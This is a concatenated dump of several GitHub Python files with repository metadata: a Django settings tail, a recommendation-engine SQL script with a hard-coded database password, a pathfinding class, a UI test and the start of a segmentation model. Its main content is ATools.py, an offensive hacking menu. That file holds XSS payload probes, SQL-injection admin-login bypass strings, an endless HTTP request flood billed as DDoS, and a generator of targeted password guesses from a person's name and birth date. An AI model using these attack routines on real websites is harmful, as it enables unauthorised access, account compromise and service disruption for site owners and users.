WSGI_APPLICATION = 'fmovies.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Lima'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
| [
"piero.marini21@gmail.com"
] | piero.marini21@gmail.com |
455e301e82cb9f97b73824292c3cb9c7ca0d10ae | 0deab564a85fa094158e11f33abc08e72ebd4df3 | /Business rules voor Recommendation Engine.py | 1ef49df966518fa10389155efc989df6052cce03 | [] | no_license | hassoonsy2/Business-rules-voor-Recommendation-Engine | 7c6dfaeb935121212c69df459de7e3e43191c24b | 2ba22874d66ffbcde3403b03b826365fb47ed9b7 | refs/heads/main | 2023-03-24T09:41:47.352535 | 2021-03-18T22:17:46 | 2021-03-18T22:17:46 | 348,071,680 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,920 | py | import psycopg2
from psycopg2 import Error
def connect():
    """Open and return a new psycopg2 connection to the huwebshop db."""
    # NOTE(review): credentials (including the password) are hard-coded;
    # move them to environment variables or a config file.  Every call
    # opens a fresh connection that the caller is responsible for closing.
    connection = psycopg2.connect(host='localhost', database='huwebshop', user='postgres', password='Xplod_555')
    return connection
def disconnect():
    """Open a new connection and immediately close it (returns None)."""
    # NOTE(review): this does NOT close any connection opened elsewhere —
    # connect() creates a brand-new connection here and only that one is
    # closed, so this function is effectively a no-op for callers.
    con = connect()
    return con.close()
def sql_execute(sql, value):
    """Execute one parameterized statement and commit it.

    Args:
        sql: statement string with %s placeholders.
        value: sequence of parameters bound to the placeholders.
    """
    con = connect()
    try:
        cur = con.cursor()
        cur.execute(sql, value)
        # BUG FIX: each call opens its own connection, so the commit must
        # happen here — the module-level commit() commits a different,
        # freshly opened connection and the original inserts were never
        # persisted.  The connection is also closed to stop it leaking.
        con.commit()
    finally:
        con.close()
def sql_select(sql):
    """Run a SELECT statement and return all rows.

    Args:
        sql: query string to execute.

    Returns:
        List of result tuples from cursor.fetchall().
    """
    con = connect()
    try:
        cur = con.cursor()
        cur.execute(sql)
        return cur.fetchall()
    finally:
        # BUG FIX: the original never closed the per-call connection,
        # leaking one connection per query.
        con.close()
def sql_query(sql):
    """Execute a statement without parameters (used for DDL) and commit.

    Args:
        sql: statement string (e.g. DROP/CREATE TABLE).
    """
    con = connect()
    try:
        cur = con.cursor()
        cur.execute(sql)
        # BUG FIX: commit on the same connection that ran the statement.
        # The module-level commit() opens a *new* connection, so DDL run
        # through the original function was rolled back when this
        # connection was garbage-collected.
        con.commit()
    finally:
        con.close()
def commit():
    """Commit on a freshly opened connection (effectively a no-op)."""
    # NOTE(review): connect() returns a NEW connection with no pending
    # work, so this commit never affects statements executed through
    # sql_execute/sql_query, which use their own connections.  Kept for
    # interface compatibility with existing callers.
    c = connect()
    c.commit()
# >> { Content-Based Filtering } <<<
def select_most_sold_products():
    """Return (prodid, name, order_count) rows, most-sold first.

    Joins orders onto products and counts how often each product was
    ordered.  Returns None if the query raises (the error is printed).
    """
    try:
        return sql_select("""SELECT orders.prodid, products.name,
    COUNT(*)
    FROM orders
    INNER JOIN products ON Orders.prodid = products.id
    GROUP BY prodid ,products.name
    ORDER BY COUNT(*) DESC ; """)
    except (Exception, psycopg2.DatabaseError) as error:
        # NOTE(review): on failure this prints and implicitly returns
        # None; callers that iterate the result would then crash.
        print(error)
def best_seller():
    """(Re)create the Best_seller table and fill it with order counts.

    Drops any existing Best_seller table, recreates it, then inserts one
    row per product from select_most_sold_products().
    """
    try:
        sql_query("DROP TABLE IF EXISTS Best_seller CASCADE")
        sql_query("""CREATE TABLE Best_seller
    (prodid VARCHAR PRIMARY KEY,
    name VARCHAR,
    Counter INTEGER ,
    FOREIGN KEY (prodid) REFERENCES products(id));""")
        results = select_most_sold_products()
        # Insert the counted rows into the freshly created table.
        for row in results:
            prodid = row[0]   # product id
            name = row[1]     # product name
            cont = row[2]     # times ordered
            sql_execute("Insert into Best_seller(prodid ,name , Counter ) VALUES (%s , %s, %s)",[prodid,name,cont])
            commit()
    except (Exception, psycopg2.DatabaseError) as error:
        print(error)
    print("Content Filtering {Best Seller } is Done ")
best_seller()
def select_most_viewed_products():
""" This function will Select & count every product from Tabel profiles previously viewed on the Postgres db """
try:
return sql_select("""SELECT profiles_previously_viewed.prodid, products.name,
COUNT(*)
FROM profiles_previously_viewed
INNER JOIN products ON profiles_previously_viewed.prodid = products.id
GROUP BY prodid ,products.name
ORDER BY COUNT(*) DESC ; """)
except (Exception, psycopg2.DatabaseError) as error:
print(error)
def most_viwed_products():
"""This function will Create Tabel Most viwed products on the Postgres db """
try:
sql_query("DROP TABLE IF EXISTS most_viwed_products CASCADE")
sql_query("""CREATE TABLE most_viwed_products
(prodid VARCHAR PRIMARY KEY,
name VARCHAR,
Counter INTEGER ,
FOREIGN KEY (prodid) REFERENCES products(id));""")
commit()
results = select_most_viewed_products()
#Right , now we can insert the result into the Tabel
for row in results:
prodid = row[0]
name = row[1]
cont = row[2]
sql_execute("Insert into most_viwed_products(prodid ,name , Counter ) VALUES (%s , %s, %s)",[prodid,name,cont])
commit()
except(Exception, psycopg2.DatabaseError) as error:
print(error)
print("Content Filtering {Most viwed products } is Done ")
most_viwed_products()
# >> { Collaborative Filtering } <<<
def select_profiels_types_bouncer_and_browser():
    """Fetch profile/product rows and split them by profile segment.

    Returns:
        (bouncer_list, browser_list): rows whose segment column equals
        "BOUNCER" and "BROWSER" respectively.  Returns None if the query
        fails (the error is printed).
    """
    bouncer_list = []
    BROWSER_list = []
    try:
        result = sql_select("""SELECT profiles.id, profiles.segment,profiles_previously_viewed.prodid, products.name
    FROM profiles
    INNER JOIN profiles_previously_viewed ON profiles.id = profiles_previously_viewed.profid
    INNER JOIN products on profiles_previously_viewed.prodid = products.id
    GROUP BY profiles.id, profiles.segment ,profiles_previously_viewed.prodid ,products.name ;""")
        # Row layout: [0]=profile id, [1]=segment, [2]=product id, [3]=name.
        for row in result:
            if row[1] == "BOUNCER":
                bouncer_list.append(row)
            # BUG FIX: the original tested `result[1]` (a whole row of the
            # result set) against "BROWSER", which is never true, so the
            # browser list was always empty.  Compare the row's segment.
            elif row[1] == "BROWSER":
                BROWSER_list.append(row)
        return bouncer_list, BROWSER_list
    except (Exception, psycopg2.DatabaseError) as error:
        print(error)
def profiels_types_bouncer_and_browser():
""" This function will create Tabels for different types of profiels on the Postgres db """
try:
sql_query("DROP TABLE IF EXISTS profiels_type_browsers CASCADE")
sql_query("DROP TABLE IF EXISTS profiels_type_boucer CASCADE")
#One For BROWSERS types
sql_query("""CREATE TABLE profiels_type_browsers
(profid VARCHAR ,
prodid VARCHAR ,
product_name VARCHAR ,
segment VARCHAR ,
FOREIGN KEY (prodid) REFERENCES products(id),
FOREIGN KEY (profid) REFERENCES profiles(id));""")
#And one for BOUNCERS types
sql_query("""CREATE TABLE profiels_type_boucer
(profid VARCHAR ,
prodid VARCHAR ,
product_name VARCHAR ,
segment VARCHAR ,
FOREIGN KEY (prodid) REFERENCES products(id),
FOREIGN KEY (profid) REFERENCES profiles(id));""")
commit()
bouncer , BROWSER = select_profiels_types_bouncer_and_browser()
#Inserting the data into the tabels
for row in bouncer :
profid = row[0]
segment = row[1]
prodid = row[2]
name = row[3]
sql_execute("Insert into profiels_type_boucer(profid ,segment , prodid, product_name) VALUES (%s , %s, %s, %s)",[profid,segment,prodid , name])
commit()
for row0 in BROWSER :
profid1 = row0[0]
segment1 = row0[1]
prodid1 = row0[2]
name1 = row0[3]
sql_execute("Insert into profiels_type_browsers(profid ,segment , prodid, product_name ) VALUES (%s , %s, %s, %s)",[profid1,segment1,prodid1 , name1])
commit()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
print("Collaborative Filtering {profiels_type_browsers & bouncers} are Done ")
profiels_types_bouncer_and_browser()
def select_profiels_type_buyer():
"""This fuction will Select & filter the type BUYER profiels the Postgres db """
try:
return sql_select("""SELECT sessions.id, sessions.profid,sessions.segment, orders.prodid, products.name
FROM sessions
INNER JOIN orders ON sessions.id = orders.sessionsid
INNER JOIN products on orders.prodid = products.id
GROUP BY sessions.id, sessions.profid,orders.prodid, products.name, sessions.segment ;
""")
except (Exception, psycopg2.DatabaseError) as error:
print(error)
def profiels_type_buyer():
""" This function will create profiels type buyer for on the Postgres db """
try:
sql_query("DROP TABLE IF EXISTS profiels_type_buyer CASCADE")
commit()
sql_query("""CREATE TABLE profiels_type_buyer
(profid VARCHAR ,
prodid VARCHAR ,
product_name VARCHAR ,
segment VARCHAR ,
FOREIGN KEY (prodid) REFERENCES products(id),
FOREIGN KEY (profid) REFERENCES profiles(id)); """)
commit()
BUYER = select_profiels_type_buyer()
for row in BUYER :
profid1 = row[1]
segment1 = row[2]
prodid1 = row[3]
name1 = row[4]
sql_execute("Insert into profiels_type_buyer(profid ,segment , prodid, product_name ) VALUES (%s , %s, %s, %s)",[profid1,segment1,prodid1 , name1])
commit()
except (Exception, psycopg2.DatabaseError) as error :
print(error)
print("Collaborative Filtering {profiels_type_buyer} is Done ")
profiels_type_buyer()
""" TEST !! """
print("Content-Based Filtering \n")
print("Populair bij op = op \n")
print(sql_select("""SELECT prodid , name
FROM BEST_seller
WHERE Counter > 1000
LIMIT 4; """),"\n")
print("Andere kijken ook \n")
print(sql_select(""" SELECT prodid , name
FROM most_viwed_products
WHERE Counter > 5000
LIMIT 4; """), "\n")
print("Collaborative Filtering \n ")
print(" U kan de ID {5a394475ed29590001038e43} gebruiken Voor {BUYER} \n en ID {59dce40ea56ac6edb4c37dfd} gebruiken Voor {BOUNCER} \n En ID {59dce40ea56ac6edb4c37df5} Voor {BROWSER} ")
IDp = input("Voer Eem ID in ")
if IDp == "5a394475ed29590001038e43" :
print("BUYER Type")
print(sql_select("""SELECT prodid , product_name
FROM profiels_type_buyer
LiMIT 4 ;"""))
elif IDp == "59dce40ea56ac6edb4c37dfd":
print("BOUNCER TYPE ")
print(sql_select("""SELECT prodid , product_name
FROM profiels_type_boucer
LiMIT 4 ;"""))
elif IDp == "59dce40ea56ac6edb4c37df5":
print("BROWSER TYPE")
print(sql_select("""SELECT prodid , product_name
FROM profiels_type_browsers
LiMIT 4 ;"""))
disconnect() | [
"71430169+hassoonsy2@users.noreply.github.com"
] | 71430169+hassoonsy2@users.noreply.github.com |
ce7a61def0f53cb668183add833aabc77c48c1b5 | 26dc729f95901e3a2dea601a7f9918b40a5bd5b1 | /Position.py | dc8baea414e339d06e0be7436571574f71ae0031 | [
"MIT"
] | permissive | yuvrajwaraich/Pathfinder | d3055310fc1b68925379091d6e2c17ea441784f1 | 99ea7f3f6c723ac57299e8dcefb275872533dfc0 | refs/heads/master | 2022-12-23T15:38:48.760347 | 2020-09-29T01:12:10 | 2020-09-29T01:12:10 | 299,469,925 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,581 | py | class Position():
def __init__(self, row, col, squareType="PATH", prev=None, g_cost=0, h_cost=0):
self.row = row
self.col = col
self.squareType = squareType
self.prev = prev
self.visited = False
self.g_cost = g_cost
self.h_cost = h_cost
self.f_cost = g_cost + h_cost
def getRow(self):
return self.row
def getCol(self):
return self.col
def getType(self):
return self.squareType
def setType(self, newType):
self.squareType = newType
def getTypeString(self):
if self.squareType == "START":
return "S"
elif self.squareType == "FINISH":
return "F"
elif self.squareType == "WALL":
return "#"
else:
return "."
def getPrev(self):
return self.prev
def setPrev(self, pos):
self.prev = pos
def getVisited(self):
return self.visited
def setVisited(self, value):
self.visited = value
def getGCost(self):
return self.g_cost
def setGCost(self, newCost):
self.g_cost = newCost
self.f_cost = self.g_cost + self.h_cost
def getHCost(self):
return self.h_cost
def setHCost(self, newCost):
self.h_cost = newCost
self.f_cost = self.g_cost + self.h_cost
def getFCost(self):
return self.f_cost
def toString(self):
return f'coords = {self.row, self.col}, SquareType = "{self.squareType}"'
| [
"noreply@github.com"
] | yuvrajwaraich.noreply@github.com |
37d6e9b44bdd2a6a959ddb491fe0ca8dfc01fdcf | 2e5b9de7f9e545655c323e344840d2648b6459db | /ATools.py | b13e05e4fe523c55b249ed11f4528e3ede3da932 | [] | no_license | AbdXH4K3r/ATools | a6871fca919eb8216bebcf1bd29d8b336048dd9d | 878431b1e52c550e07668868dce3f080e4b1f5b9 | refs/heads/master | 2020-04-07T00:46:14.245202 | 2019-01-12T13:08:03 | 2019-01-12T13:08:03 | 157,917,864 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,149 | py | # -*- coding: utf-8 -*
#ATOOLS by Abdxslayer
#http://www.github.com/ABDXH4K3r
import os
import sys
import time
import re
import requests
import random
import socket
import re
import platform
import json
from urllib2 import urlopen
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
def clear():
sys = platform.system()
if sys == 'Windows':
os.system('cls')
if sys == 'Linux':
os.system('clear')
def exit():
exit = raw_input("Enter To Exit...")
def XSS():
red = '\33[31m'
yellow = '\33[33m'
green = '\33[92m'
blue = '\33[34m'
def stop():
exit()
imp = (red+("IMPORTANT !!!, Download Geckodriver then put in the path !! "))
print imp
link = raw_input(red+"[+] Target Link : ")
opt = (yellow+"[+] Option (-easy,-medium): ")
easyscript = ("'<script>alert('XSS')</script>")
mediumscript = ["<svg onload='XSS'>",'<IMG """><script>alert("xss")</script>">"',"<scri<script>pt>JS Code</script>",'"><img src="link" onerror=Js code;']
browser = webdriver.Firefox()
if opt=='-easy':
clear()
r = requests.get(link+easyscript)
browser.get(link+easyscript)
if r.status_code==200:
try:
WebDriverWait(browser, 3).until(EC.alert_is_present(),
'Timed out waiting for PA creation ' +
'confirmation popup to appear.')
alert = browser.switch_to.alert
alert.accept()
print("alert accepted")
print str(green+'[+] Success !,'+blue+'Website Has XSS level easy.'+"XSS By "+easyscript)
except TimeoutException:
print("no alert")
print str(red+'[-] Website Xss vulnerability is high level,'+yellow+'try "-medium" or "high" option.')
if opt=='-medium':
clear()
browser.get(link)
one = requests.get(link+"'"+mediumscript[0])
browser.get(link+"'"+mediumscript[0])
if one.status_code == 200:
try:
WebDriverWait(browser, 3).until(EC.alert_is_present(),
'Timed out waiting for PA creation ' +
'confirmation popup to appear.')
alert = browser.switch_to.alert
alert.accept()
print("alert accepted")
print str(green+'[+] Success !,'+blue+'Website Has XSS level easy.'+"XSS By "+easyscript)
except TimeoutException:
two = requests.get(link+"'"+mediumscript[1])
if two.status_code == 200:
browser.get(link+"'"+mediumscript[1])
try:
WebDriverWait(browser, 3).until(EC.alert_is_present(),
'Timed out waiting for PA creation ' +
'confirmation popup to appear.')
alert = browser.switch_to.alert
alert.accept()
print("alert accepted")
print str(green+"Success !"+'Xss By '+mediumscript[1])
except TimeoutException:
print("no alert")
three = requests.get(link+"'"+mediumscript[2])
try:
WebDriverWait(browser, 3).until(EC.alert_is_present(),
'Timed out waiting for PA creation ' +
'confirmation popup to appear.')
alert = browser.switch_to.alert
alert.accept()
print("alert accepted")
print str(green+"Success !"+'Xss By '+mediumscript[2])
except TimeoutException:
print("no alert")
browser.get(link+"'"+mediumscript[3])
four = requests.get(link+"'"+mediumscript[3])
try:
WebDriverWait(browser, 3).until(EC.alert_is_present(),
'Timed out waiting for PA creation ' +
'confirmation popup to appear.')
alert = browser.switch_to.alert
alert.accept()
print("alert accepted")
print str(green+"Success !"+'Xss By '+mediumscript[1])
except TimeoutException:
print("no alert")
print str(red+'[-] Failed !, Medium Xss is not valid for this website. We Are working for The high option...')
if opt=='-high':
print str(yellow+"Soon...")
clear()
def Logo():
print ("""\33[92m
██████ █████ █████ ██ ██
██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██ ██ ██
██████ ██████ ██ ██ ██
██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██ ██ ██
██ ██ █████ █████ ██ ██
SLAYER
""")
def WebInfo():
clear()
lineacc = "[================[New]=================]"
lineaccunder = "[====================[END]===================]\n"
filepath = raw_input("Enter File Path : ")
with open(filepath) as fp:
line = fp.readline()
cnt = 1
while line:
print (lineacc)
print("[Line {}: {}]".format(cnt, line.strip()))
command = ('host'+' '+line)
print("-------------------------------------------")
cmnd = os.system(command)
owner = ('whois ',line,' | grep "OrgName"')
owner = "%s%s%s"%(owner)
os.system(owner)
print (lineaccunder)
line = fp.readline()
cnt += 1
Logo()
tools = raw_input("""\33[34m
[==========Tools==========]
\33[34m[\33[31m1\33[34m].\33[33mInformation Gathering.
\33[34m[\33[31m2\33[34m].\33[33mXSS Tools.
\33[34m[\33[31m3\33[34m].\33[33mSQL Injection Tools.
\33[34m[\33[31m4\33[34m].\33[33mAdmin Panel Attack.
\33[34m[\33[31m5\33[34m].\33[33mWebsite Info Gathering.
\33[34m[\33[31m6\33[34m].\33[33mULTRA DDOS.
\33[34m[\33[31m7\33[34m].\33[33mUpdate & Upgrade.
\33[34m[\33[31m99\33[34m].\33[33mEXIT.
\33[31mSet > """)
def website_info_grab():
clear()
Logo()
url = raw_input("\33[92mURL \33[31mTarget\33[92m \33[92m(Ex: google.com) \33[92m : ")
ip = socket.gethostbyname(url)
location = geolite2.lookup(ip)
location is not None
clear()
print("[==========Website Info==========]")
print("\33[92mHost Ip : \33[92m"+ip)
print ("\33[92mLocation : \33[92m"+location.country)
print ("\33[92mTimezone : \33[92m"+location.timezone)
request = b"GET / HTTP/1.1\nHost: ",url,'\n\n'
request = "%s%s%s"%(request)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((url, 80))
s.send(request)
result = s.recv(10000)
print(result)
def DDOS():
clear()
Logo()
target = raw_input("[X] Enter Target (*http://* is obligatory) : ")
num = 0
while True:
num = num+1
r = requests.get(target)
print ("[X] DDOS {} > CODE > {} SENT [X]".format(num,r.status_code))
def Passwordlist():
    """Generate a personalised password wordlist from a name, surname and
    birth date, and write it (one candidate per line) to a user-chosen
    .txt file. Produces exactly the same entries, in the same order, as the
    previous long write chain."""
    clear()
    Logo()
    name = raw_input("Enter Name : ")
    lastname = raw_input("Enter The LastName : ")
    dbirth = raw_input("Enter Day of birth : ")
    mbirth = raw_input("Enter Month of birth : ")
    ybirth = raw_input("Enter Year of birth : ")
    namepass = raw_input("Enter A Name of Your PasswordList (DON'T FORGET .txt) : ")
    # Personal combinations, in the original order.
    words = [
        name + lastname,
        lastname + name,
        name + dbirth,
        dbirth + name,
        name + name,
        name + ybirth,
        name + mbirth,
        ybirth + name,
        mbirth + name,
        ybirth + lastname,
        dbirth + lastname,
        mbirth + lastname,
        ybirth + lastname + name,
        ybirth + name + lastname,
        lastname + lastname + ybirth,
        name + lastname + ybirth,
        name + lastname + dbirth,
        name + lastname + mbirth,
    ]
    # name+lastname followed by every year from 2000 through 2020.
    for year in range(2000, 2021):
        words.append(name + lastname + str(year))
    # Common numeric suffixes ('123' is deliberately listed twice, exactly
    # as the original output did).
    for suffix in ('123', '666', '000', '123', '123456'):
        words.append(name + lastname + suffix)
    # Static keyboard-walk passwords.
    words += [
        "Azerty",
        "Azerty123",
        "Azerty123456",
        "Azerty112233",
        "Azerty2000",
        "Azerty2017",
        "Azerty2018",
        "Azerty2019",
        "Azerty2020",
        "Azertyuiop^$",
    ]
    file = open(namepass, 'w')
    for word in words:
        file.write(word + "\n")
    file.close()
def ip_info():
    """Look up geolocation details for a user-supplied IP via ipinfo.io."""
    clear()
    Logo()
    ip = raw_input("[+] Enter IP Adress : ")
    # Query the address the user entered. The old code always fetched
    # http://ipinfo.io/json, which reports the *local* machine's public IP
    # and silently ignored the input.
    url = 'http://ipinfo.io/' + ip + '/json'
    response = urlopen(url)
    data = json.load(response)
    IP = data['ip']
    org = data['org']
    city = data['city']
    country = data['country']
    region = data['region']
    info = 'IP detail:\nIP : {4} \nRegion : {1} \nCountry : {2} \nCity : {3} \nOrg : {0}'.format(org, region, country, city, IP)
    print(info)
def AdminPanel():
    """Probe an admin login page: check it exists, then try a handful of
    classic SQL-injection strings as HTTP basic-auth credentials."""
    clear()
    Logo()
    website = raw_input("Enter website Admin Login Page : ")
    r = requests.get(website)
    if r.status_code == 200 or r.status_code == 403:
        print ("[+] SUCCESS WE FOUNDED THE WEBSITE !")
        print ("[+] TRYING TO BYPASS THE ADMIN LOGIN ...")
        # Each attempt sends an injection string as username and/or password.
        # NOTE: status comparisons used `is not 200` (object identity), which
        # only worked by accident via CPython's small-int cache; use !=.
        log = requests.get(website, auth=("' or 1=1 --", "' or 1=1 --"))
        if log.status_code != 200:
            print ("Method 1 Failure. [/] Trying other methods...")
            log = requests.get(website, auth=("' or ''='", "' or ''='"))
            if log.status_code != 200:
                print ("Method 2 Failure. [/] Trying other methods...")
                log = requests.get(website, auth=("' or 1--", ""))
                if log.status_code != 200:
                    print ("Method 3 Failure. [/] Trying other methods...")
                    log = requests.get(website, auth=("') or true--", ""))
                    if log.status_code != 200:
                        print ("Method 4 Failure. [/] Trying other methods...")
                        log = requests.get(website, auth=("'-'", ""))
                        if log.status_code != 200:
                            exit = raw_input("[-] FAILED TO BYPASS ADMIN PANEL...")
                            print ("Method 5 Failure. \nSorry :( You can report this to me: \n As8apple@gmail.com")
    else:
        # Previously this was a separate `if r.status_code is not 200`, which
        # also fired for 403 responses that had just been treated as a hit
        # above; `else` keeps the two outcomes mutually exclusive.
        print ("[-] FAILED WE DIDN'T FOUND THE WEBSITE !")
def sql_inj():
    """Naive SQL-injection probe: append a single quote to the URL and record
    the site in result_sql.txt when the server still answers 200."""
    clear()
    Logo()
    website = raw_input("Enter website Url : ")
    try:
        # The requests calls belong inside the try: the except branch below
        # is meant to report connection/URL errors, but previously both
        # requests.get calls ran before the try and were never caught.
        r = requests.get(website)
        print ("\33[34m[\33[33m+\33[34m] \33[33mCONNECTING TO",r.url)
        # Append a single quote; an unfiltered backend often reacts to it.
        final = requests.get(website + "'")
        if final.status_code == 200:
            # Open in append mode: mode 'w' truncated the "vulnerable list"
            # on every run, contradicting the "ADDED TO YOUR LIST" message.
            file = open("result_sql.txt", 'a')
            file.write(website + '\n')
            file.close()
            print ("\33[34m[\33[33m+\33[34m] \33[33mSUCCESS, WEBSITE ADDED TO YOUR SQL VULNURABLE LIST.")
        else:
            print ("\33[34m[-] FAILED, THE WEBSITE ENTRED IS NOT VULNURABLE.")
    except Exception:
        print ("\33[34m[-] ERROR, CHECK THE LINK IF IT EXIST/ADD (http://www.) to the website.")
# Top-level dispatch on the main-menu choice read earlier.
if tools =='1':
    # Information-gathering submenu.
    clear()
    Logo()
    info_grab = raw_input("""
[==========Information Gathering==========]
\33[34m[\33[31m01\33[34m].\33[33mWebsite.
\33[34m[\33[31m02\33[34m].\33[33mPasswordList.
\33[34m[\33[31m03\33[34m].\33[33mIp.
\33[31mSet > """)
    if info_grab == '1':
        website_info_grab()
    if info_grab == '2':
        clear()
        Passwordlist()
    if info_grab == '3':
        ip_info()
if tools == '2':
    XSS()
if tools=='3':
    sql_inj()
if tools=='4':
    AdminPanel()
if tools=='5':
    WebInfo()
if tools=='6':
    DDOS()
if tools=='7':
    # "Update & Upgrade": just opens the author's GitHub page in a browser.
    clear()
    Logo()
    system = platform.system()
    if system == 'Windows':
        os.system('start "http://github.com/ABDXH4K3r"')
    if system == 'Linux':
        os.system('firefox "http://github.com/ABDXH4K3r"')
if tools=='99':
    exit()
| [
"noreply@github.com"
] | AbdXH4K3r.noreply@github.com |
b92267db4323341dfa9c38b216bca9f91bb337b0 | 76b4790cc405d8287fccfa2dd691f4415fc88a11 | /format/mpls/playlist/play_item/__init__.py | c58d6a32d299fbb04eff8c2fa3060a099b8e3ce4 | [] | no_license | Nicba1010/blumount-python | 8131f6685469e73b05068c3e41c9b709ccc21a5a | 648c44b74617186172c767c66c98299e7688c056 | refs/heads/master | 2022-12-16T15:14:12.294720 | 2020-09-13T11:55:01 | 2020-09-13T11:55:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31 | py | from .play_item import PlayItem | [
"nicba1010@gmail.com"
] | nicba1010@gmail.com |
6d2cce74c330a140309c8fdbe07a96d959916b66 | e2e08d7c97398a42e6554f913ee27340226994d9 | /pyautoTest-master(ICF-7.5.0)/test_case/scg_old/scg_obj_shell_2nd/test_c40407.py | bc6d1b372424eea87293ec88ccf7c74bca513fd8 | [] | no_license | lizhuoya1111/Automated_testing_practice | 88e7be512e831d279324ad710946232377fb4c01 | b3a532d33ddeb8d01fff315bcd59b451befdef23 | refs/heads/master | 2022-12-04T08:19:29.806445 | 2020-08-14T03:51:20 | 2020-08-14T03:51:20 | 287,426,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,560 | py | import pytest
import time
import sys
from page_obj.scg.scg_def import *
from page_obj.scg.scg_def_obj import *
from page_obj.scg.scg_def_log import *
from page_obj.common.rail import *
from page_obj.scg.scg_def_acl import *
from os.path import dirname, abspath
sys.path.insert(0, dirname(dirname(abspath(__file__))))
test_id = 40407
# Add a weekly schedule containing one basic schedule, then check the log.
def test_obj_wxw(browser):
    """End-to-end UI test: create a basic schedule and a weekly schedule in
    the SCG web UI, then assert the management log records the addition.
    On any error, reboots the device to restore configuration and fails."""
    try:
        login_web(browser, url="10.2.2.81")
        # Switch back to the default frame
        browser.switch_to.default_content()
        # Switch to the left-hand tree frame
        browser.switch_to.frame("lefttree")
        # Click "Objects"
        browser.find_element_by_xpath(对象).click()
        # Click "Schedules"
        browser.find_element_by_xpath(计划任务).click()
        # Click "Basic schedule"
        browser.find_element_by_xpath('//*[@id="menu"]/div[4]/div/ul/li[5]/ul/li[1]/span/a/span').click()
        add_obj_schdule_wxw(browser, name='schdule_407', desc='描述', recurring='yes', fromtime='01:00', totime='02:00')
        # Switch back to the default frame
        browser.switch_to.default_content()
        # Switch to the left-hand tree frame
        browser.switch_to.frame("lefttree")
        # Click "Schedules"
        browser.find_element_by_xpath(计划任务).click()
        # Click "Weekly schedule"
        browser.find_element_by_xpath(周计划任务).click()
        # Attach the basic schedule to Monday and Sunday only.
        add_obj_weekly_schdule_wxw(browser, name='week_schd_407', desc='miaoshu',
                                   monday='yes', schdule1='schdule_407',
                                   tuesday='', schdule2='',
                                   wednesday='', schdule3='',
                                   thursday='', schdule4='',
                                   friday='', schdule5='',
                                   saturday='', schdule6='',
                                   sunday='yes', schdule7='schdule_407', )
        time.sleep(2)
        # Switch back to the default frame and open the management log
        browser.switch_to.default_content()
        get_log(browser, 管理日志)
        browser.switch_to.default_content()
        # Switch to the content frame to read the log entry
        browser.switch_to.frame("content")
        loginfo = browser.find_element_by_xpath('//*[@id="namearea0"]').text
        # print(loginfo)
        try:
            assert "配置周程表对象成功,添加内部对象 [week_schd_407]" in loginfo
            rail_pass(test_run_id, test_id)
        except:
            # Report the failure to the rail tracker, then re-raise via assert
            rail_fail(test_run_id, test_id)
            assert "配置周程表对象成功,添加内部对象 [week_schd_407]" in loginfo
    except Exception as err:
        # If any step above failed, reboot the device to restore configuration
        reload(hostip="10.2.2.81")
        print(err)
        rail_fail(test_run_id, test_id)
        time.sleep(70)
        assert False
# Allow running this test module directly (outside a pytest session).
if __name__ == '__main__':
    pytest.main(["-v", "-s", "test_c40407.py"])
"15501866985@163.com"
] | 15501866985@163.com |
8afba1b98f5baf9799fa457a5d385645ca3c76ae | 0bccd9c02c258705bcbb429c29c7c84ecdef7d71 | /model/LinkNet.py | da0bde540d2d6f93f1e4a055ef6a620d8caa505a | [
"MIT"
] | permissive | XiudingCai/vessel-segmentation-for-retina | 805f11b697c4cbf9a31fbd0960d30d6fe9bce215 | 664db9d44d894442ce957801865858874ece35c3 | refs/heads/master | 2023-03-15T04:13:44.147287 | 2021-03-26T03:28:24 | 2021-03-26T03:28:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,131 | py | ############################################################################################
# LinkNet: Exploiting Encoder Representations for Efficient Semantic Segmentation
# Paper-Link: https://arxiv.org/pdf/1707.03718.pdf
############################################################################################
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchsummary import summary
from torchvision.models import resnet
__all__ = ["LinkNet"]
class BasicBlock(nn.Module):
    """ResNet-style residual block: two convolutions with batch norm, plus
    an identity skip connection (projected with a strided 1x1 conv+BN when
    the block downsamples)."""

    def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, groups=1, bias=False):
        super(BasicBlock, self).__init__()
        # Layer creation order is kept stable for reproducible parameter init.
        self.conv1 = nn.Conv2d(in_planes, out_planes, kernel_size, stride, padding, groups=groups, bias=bias)
        self.bn1 = nn.BatchNorm2d(out_planes)
        self.relu = nn.ReLU(inplace=True)
        self.conv2 = nn.Conv2d(out_planes, out_planes, kernel_size, 1, padding, groups=groups, bias=bias)
        self.bn2 = nn.BatchNorm2d(out_planes)
        self.downsample = None
        if stride > 1:
            # Project the input so the residual addition shapes line up.
